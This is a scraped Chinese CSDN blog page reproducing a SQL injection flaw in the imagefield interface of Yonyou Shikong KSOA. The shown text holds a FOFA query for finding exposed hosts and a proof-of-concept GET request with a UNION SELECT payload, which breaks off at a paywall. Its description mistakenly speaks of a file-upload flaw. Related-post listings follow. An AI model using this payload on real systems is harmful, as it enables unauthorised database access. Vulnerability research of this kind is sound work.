用友时空-KSOA-imagefield-sql注入

最新推荐文章于 2024-07-19 17:26:37 发布
最新推荐文章于 2024-07-19 17:26:37 发布
阅读量165 收藏
点赞数 6
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137046924
版权

漏洞描述

用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业前沿的IT需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话。用友时空KSOA平台ImageUpload处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。

受影响版本

用友-时空KSOA

FOFA关键字

app=”用友-时空KSOA”

漏洞复现

POC:

GET /servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1'+union+select+sys.fn_varbintohexstr(hashbytes('md5','123456'))--+ HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 6
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
【漏洞复现】用友时空-KSOA-imagefield-sql注入
知黑而守白
03-26 109
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业前沿的IT需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。用友时空KSOA imagefield 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
用友时空KSOA-imagefield接口存在SQL注入漏洞
qq_36334672的博客
04-01 178
用友时空KSOA imagefield接口存在SQL注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
用友时空KSOA SQL注入漏洞复现
0xSec
08-13 2470
用友时空KSOA /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet接口和/servlet/imagefield接口处存在sql注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
用友时空KSOA SQL注入漏洞[2023-HW]
holyxp的博客
08-16 909
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。
用友时空KSOA sKeyvalue SQL注入漏洞复现
Keepb1ue的博客
12-29 630
用友KSOA用友集团推出的一款基于SOA架构的企业级应用平台,旨在为企业提供全面的信息化解决方案。它包括了多个模块,如财务管理、人力资源管理、供应链管理等,可以帮助企业实现数字化转型。它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。
【1day】用友时空KSOA平台 imagefield接口SQL注入漏洞学习
记录并分享学习安全的知识点..
09-29 242
用友时空KSOA平台是由用友网络科技股份有限公司开发的一款企业级协同办公平台,旨在提高企业管理效率和协作效率。该平台提供了多种功能模块,包括组织管理、人力资源管理、工作流管理、知识管理、项目管理、文档管理等。用友时空KSOA平台 imagefield接口存在SQL注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。
【漏洞复现】用友 时空KSOA imagefield SQL注入漏洞
凝聚力安全团队
07-16 450
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。用友 时空KSOA imagefield 接口存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限。
用友时空KSOA软件前台文件上传漏洞
holyxp的博客
08-01 621
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。用友时空KSOA平台ImageUpload处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
用友时空ccerp、ksoa zhiydoc表kl解密函数
05-27
放在数据库执行 使用方法 select dbo.jm_kl(kl),* from zhiydoc
用友时空密码查看器
02-17
首先,我们来了解一下用友时空KSOA系统。KSOA即Kingdee Service Oriented Architecture,是用友公司推出的一种基于服务导向架构的企业应用平台。它集成了业务流程、信息共享、协同工作等功能,旨在提高企业的运营...
用友时空ksoa仓储系统.doc
10-03
用友时空 KSOA 仓储系统拣货功能操作说明 用友时空 KSOA 仓储系统是基于某批发配送企业的仓库自动化管理系统,旨在实现客户订单自动分解到各楼层,并由拣货人员自助索取拣货单。为了实现这个功能,系统需要进行多个...
用友时空KSOA仓储系统.doc
10-03
用友时空KSOA仓储系统拣货功能操作说明 用友时空KSOA仓储系统是一种智能化的仓储管理系统,旨在提高仓储管理效率和准确性。在这个系统中,拣货功能是一个核心模块,旨在实现自动化的拣货过程。下面是对用友时空KSOA...
用友时空操作说明手册
12-14
用友时空操作说明手册》是一本针对KSOA系统的详尽指南,旨在帮助用户熟练掌握进销存流程。KSOA系统是一个先进的企业管理软件,主要用于处理企业的进货、销售和库存等核心业务流程。 首先,手册的第一部分是通用...
网络安全防御 -- 双机热备和带宽管理综合实验
rrl18215821889的博客
07-16 553
12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。13,办公区上网用户限制流量不超过100M,其中销售部人员在其基础上限制流量不超过60M,且销售部一共10人,每人限制流量不超过6M。16,外网访问内网服务器,下行流量不超过40M,DMZ中的每台服务器限制对外提供的最大下行带宽不超过20M。做负载分担模式,生产区和办公区的流量走FW1,游客区和DMZ区走FW3。配置g0/0/0ip和开启服务。办公区销售部带宽策略;
网络安全-网络安全及其防护措施8
LS_Ai的博客
07-17 1136
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务器上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
Web安全:未验证的重定向和转发.
最新发布
网络安全领域___专研者.
07-19 565
未验证的重定向和转发漏洞是一种常见的Web安全漏洞,它允许攻击者将用户重定向到一个恶意的URL,而不是预期的安全URL。这种漏洞通常发生在应用程序处理重定向和转发请求时,未能对目标URL进行适当的验证和过滤。
网络安全防御【防火墙双机热备带宽管理综合实验】
miss_copper的博客
07-16 1241
游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。5、生产区访问DMZ区时,需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab123,12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。链路开启过载保护,保护阈值80%;
游戏外挂的技术实现与五年脚本开发经验分享
m0_62996549的博客
07-19 520
引言: 在数字娱乐的浪潮中,电子游戏成为许多人生活中不可或缺的一部分。然而,随着游戏的普及,一些玩家为了追求更高效的游戏体验或不正当竞争优势,开始使用游戏外挂程序。这些外挂往往通过修改游戏正常运行机制来提供非法优势给使用者。作为拥有五年脚本开发经验的技术人员,我深知探索这一领域需要严谨的态度和对技术的尊重。本文将探讨游戏外挂的技术实现方法,并分享我在脚本开发领域的经验。
KSOA供应链管理系统:无缝协作与价值最大化
"KSOA供应链管理系统是一种先进的企业级解决方案,它专为用友时空设计,旨在优化企业的供应链运营。该系统的核心概念是围绕核心企业构建的商流、信息流、物流和资金流的集成网络,涵盖了供应商、制造商、仓库、配送...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值